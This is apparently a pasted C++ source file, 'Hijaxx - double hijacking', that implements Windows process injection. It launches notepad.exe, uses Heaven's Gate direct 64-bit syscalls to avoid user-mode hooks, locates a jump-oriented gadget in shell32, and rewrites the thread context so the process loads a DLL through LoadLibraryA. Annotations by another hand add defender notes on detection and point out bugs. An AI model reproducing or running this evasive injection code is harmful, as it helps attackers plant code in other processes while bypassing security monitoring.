
Hijaxx - double hijacking - C++

Mar 3rd, 2023
  1. #include "hijaxx.h"
  2.  
// Returns the system service number for the named ntdll export.
//
// func_name  name of an Nt*/Zw* export in ntdll
// Returns the 16-bit value found at byte offset 1 of the resolved stub,
// widened to DWORD — presumably the immediate of the stub's leading
// `mov eax, imm32`; TODO confirm against the ntdll build in use.
//
// NOTE(review): there is no NULL check. If GetProcAddress fails, the read
// below dereferences address 1 and faults.
//
// Defender note: resolving service numbers from ntdll at runtime and then
// issuing the instruction from outside ntdll (see Syscall64) is exactly
// what "direct syscall" detections key on — a `syscall` whose return
// address is not inside ntdll.
inline DWORD GetSystemServiceNumber(LPCSTR func_name)
{
    FARPROC NtFunc = GetProcAddress(GetModuleHandle(L"ntdll"), func_name);
    return (DWORD)*(WORD*)((BYTE*)NtFunc + 1);
}
  8.  
//need to call directly into 64bit ntdll as the wow64 version provides sanitation on args
//
// Issues a native 64-bit system call from 32-bit (WoW64) code.
//
// syscall_number  value obtained from GetSystemServiceNumber()
// argc            number of variadic arguments that follow; the first four
//                 go in registers, any beyond that are copied to the stack
// ...             the arguments, each passed as a 32-bit DWORD
// Returns the 64-bit value the kernel leaves in rax, handed back as edx:eax.
//
// Control flow: a far return to selector 0x33 moves execution into the
// process's 64-bit code segment, the x64 calling convention is assembled
// from the 32-bit caller's stack, `syscall` runs, and a far return to
// selector 0x23 moves execution back. The function is naked, so every
// instruction below is hand-written and the offsets in `reg` are hand-computed.
//
// NOTE(review): `EMIT` is not defined in this file (presumably a
// `__asm _emit` wrapper in hijaxx.h); it carries the bytes the 32-bit
// assembler cannot express. The returned status is never inspected here —
// that is the caller's job.
//
// Defender note: a far transfer to selector 0x33 from a WoW64 process (the
// "Heaven's Gate" transition) bypasses any user-mode hooks in the 32-bit
// ntdll and is itself a useful detection signal.
__declspec(naked) DWORD64 Syscall64(DWORD syscall_number, DWORD argc, ...)
{
    // Offsets from ebp while executing in 64-bit mode. `push ebp` there
    // stores 8 bytes, so the 32-bit return address sits at +8 and the first
    // parameter (syscall_number) at +0xc — presumably why the table starts
    // at 0xc rather than 0x8.
    enum reg { rax_ = 0xc, argc_ = 0x10, rcx_ = 0x14, rdx_ = 0x18, r8_ = 0x1c, r9_ = 0x20, stack_args = 0x24 };
    _asm {
            // Far return into the 64-bit segment: the stack holds cs=0x33 and
            // the address of the instruction after `retf`.
            push 0x33
            call x64
        x64 :
            add dword ptr[esp], 5
            retf
            // --- executing as 64-bit code from here on ---
            push ebp
            mov ebp, esp
            // Arguments beyond the first four are pushed last-first so they
            // land in x64 stack-argument order.
            mov ecx, dword ptr[esp + argc_]
            cmp ecx, 4
            je no_stack_args
            sub ecx, 1
        load_stack_args:
            mov eax, dword ptr[ebp + rcx_ + ecx * 4]
            cmp ecx, 4
            jl no_stack_args
            push eax
            loopnz load_stack_args
        no_stack_args :
            // x64 syscall convention: rax = service number, r10 = first
            // argument (rcx is clobbered by `syscall`), rdx/r8/r9 = args 2-4.
            mov eax, dword ptr[ebp + rax_]
            mov ecx, dword ptr[ebp + rcx_]
            mov edx, dword ptr[ebp + rdx_]
            EMIT(0X67) EMIT(0X44) EMIT(0X8b) EMIT(0X45) EMIT(0X1c)              //mov r8d,  dword ptr [ebp + r8_]  (ModRM 0x45 is an ebp base, as on the r9 line)
            EMIT(0x67) EMIT(0X44) EMIT(0X8b) EMIT(0X4d) EMIT(0X20)              //mov r9d,  dword ptr [ebp + r9_]
            EMIT(0X4c) EMIT(0X8b) EMIT(0Xd1)                                    //mov r10,  rcx
            sub esp, 20h                                                        // presumably the 32-byte shadow space the x64 ABI expects
            EMIT(0x0F) EMIT(0x05)                                               //syscall
            // In 64-bit mode the `dec eax` byte (0x48) is a REX.W prefix, so
            // the four lines below presumably execute as `mov rdx, rax` and
            // `shr rdx, 32`, leaving the 64-bit result in edx:eax.
            dec eax
            mov edx, eax
            dec eax
            shr edx, 20h
            mov esp, ebp
            pop ebp
            // Far return back to the 32-bit segment (cs=0x23): the 8-byte
            // return slot pushed by `call` is rewritten in place as
            // offset:selector, the offset adjusted to land on the final `ret`.
            call x86
        x86:
            mov dword ptr[esp + 4], 0x23
            add dword ptr[esp], 0xd
            retf
            ret
    };
}
  54.  
// Scans committed memory starting at `mod` for the bytes of `search_string`
// and returns the address of the first match, or NULL.
//
// mod            module whose base address starts the scan
// search_string  bytes to look for (compared with memcmp; see length note)
// is_code        when TRUE, regions whose Protect lacks the
//                IMAGE_SECTION_EXECUTABLE bit are skipped and one byte
//                fewer is compared
//
// The walk follows VirtualQuery regions upward until VirtualQuery fails.
// `mi` is filled in but never read, so the module's size does not bound the
// walk — it continues into whatever is mapped after the module.
//
// NOTE(review): `sizeof(search_string)` is the size of a `char*` (4 on a
// 32-bit build), not the string's length, so at most 4 (or 3 when is_code)
// bytes are compared whatever string is passed. Regions with the PAGE_GUARD
// modifier pass the `!= PAGE_NOACCESS` test and will fault when touched.
// IMAGE_SECTION_EXECUTABLE is not a PAGE_* protection constant; whether the
// mask selects executable pages depends on its definition in hijaxx.h —
// TODO confirm. The (DWORD) pointer casts assume a 32-bit build.
LPVOID SearchModuleMemory(HMODULE mod, char* search_string, BOOL is_code)
{
    LPVOID mem_regions = mod;
    MODULEINFO mi = { 0 };
    MEMORY_BASIC_INFORMATION mbi = { 0 };
    GetModuleInformation(GetCurrentProcess(), mod, &mi, sizeof(mi));   // result never used
    for (; VirtualQuery(mem_regions, &mbi, sizeof(mbi)) == sizeof(mbi); mem_regions = (LPVOID)((SIZE_T)mem_regions + mbi.RegionSize)) {
        if (mbi.State == MEM_COMMIT && mbi.Protect != PAGE_NOACCESS) {
            if ((is_code) && !(mbi.Protect & IMAGE_SECTION_EXECUTABLE))
                continue;
            // Stops 4 bytes short of the region end so the compare stays inside it.
            for (SIZE_T j = 0; j < mbi.RegionSize - 4; j++) {
                if ((memcmp(search_string, (LPVOID)((DWORD)mem_regions + j), sizeof(search_string) - ((is_code) ? 1 : 0))) == 0) {
                    return  (LPVOID)((DWORD)mem_regions + j);
                }
            }
        }
    }
    return NULL;
}
  74.  
// Launches host_file and redirects its primary thread, via its WoW64
// context, into a `push ecx / call [edx]` gadget that ends up in LoadLibraryA.
//
// host_file  path of the 32-bit executable to launch (see main)
//
// Sequence as written: CreateProcessW (not suspended; Sleep(500) is the only
// wait for initialization), SuspendThread, NtQueryInformationThread with
// THREAD_WOW_CONTEXT through Syscall64, patch Ecx/Edx/Eip,
// NtSetInformationThread, ResumeThread. Every address is located in *this*
// process and written into the target — presumably relying on kernel32 and
// shell32 sharing a base across processes for the boot session; TODO confirm.
// Using the native syscall instead of the Wow64*ThreadContext APIs is
// presumably to avoid the argument sanitization noted above Syscall64.
//
// NOTE(review): no return value is checked — CreateProcessW, both syscalls
// (`ret` is assigned and never read) and the three SearchModuleMemory
// lookups may each yield 0/NULL, leaving the context pointing nowhere.
// `dll_name` is assigned a hard-coded address and never used; `len` is only
// written through the out-parameter.
//
// Defender note: SuspendThread → read context → write context with Eip
// moved into a library rather than the image entry point → ResumeThread,
// on a process created moments earlier, is the classic thread-hijack
// pattern and is observable from the thread/context telemetry alone.
VOID Injex(LPWSTR host_file)
{
    CONTEXT ctx = { 0 };
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    ctx.ContextFlags = CONTEXT_FULL;                       // ask for control + integer registers
    DWORD len, dll_name = 0x006A2E58;                      // dll_name unused; len is the query's out-param
    CreateProcessW(host_file, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);   // inherits handles, no CREATE_SUSPENDED
    Sleep(500);                                            // fixed delay for process start — race-prone
    SuspendThread(pi.hThread);
    // Reads the 32-bit (WoW64) register state of the primary thread.
    DWORD64 ret = Syscall64(
        GetSystemServiceNumber("NtQueryInformationThread"),
        5,
        (DWORD)pi.hThread,
        THREAD_WOW_CONTEXT,
        &ctx,
        sizeof(ctx),
        &len);

    //find JOP stuff
    FARPROC _LoadLibraryA = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
    // With is_code FALSE only the first 4 bytes ("1.dl") are compared, so this
    // finds some string in kernel32's mapped image starting with those bytes.
    LPVOID remote_lib_string = SearchModuleMemory(GetModuleHandle(L"kernel32.dll"), "1.dll", FALSE);
    //"\x51\xFF\x12"
    //push ecx
    //call[edx]
    LPVOID gadget = SearchModuleMemory(LoadLibrary(L"shell32.dll"), "\x51\xFF\x12", TRUE);
    // The search pattern here is the bytes of LoadLibraryA's own address, so
    // the result is a slot in shell32 that *contains* that address —
    // presumably an import-table entry — which `call [edx]` dereferences.
    LPVOID LoadLibraryA_ptr = &_LoadLibraryA;
    LoadLibraryA_ptr = SearchModuleMemory(LoadLibrary(L"shell32.dll"), (char*)LoadLibraryA_ptr, FALSE);
    ctx.Ecx = (DWORD)remote_lib_string;                    // argument pushed by the gadget
    ctx.Edx = (DWORD)LoadLibraryA_ptr;                     // pointer the gadget calls through
    ctx.Eip = (DWORD)gadget;                               // thread resumes here

    // Writes the patched register state back; `ret` is not examined.
    ret = Syscall64(
        GetSystemServiceNumber("NtSetInformationThread"),
        4,
        (DWORD)pi.hThread,
        THREAD_WOW_CONTEXT,
        &ctx,
        sizeof(ctx));

    ResumeThread(pi.hThread);
}
  117.  
// Entry point: hands a hard-coded System32 notepad.exe path to Injex.
// argc/argv are accepted but unused.
int main(int argc, char *argv[])
{
    Injex(L"c:\\windows\\system32\\notepad.exe");
    return 0;
}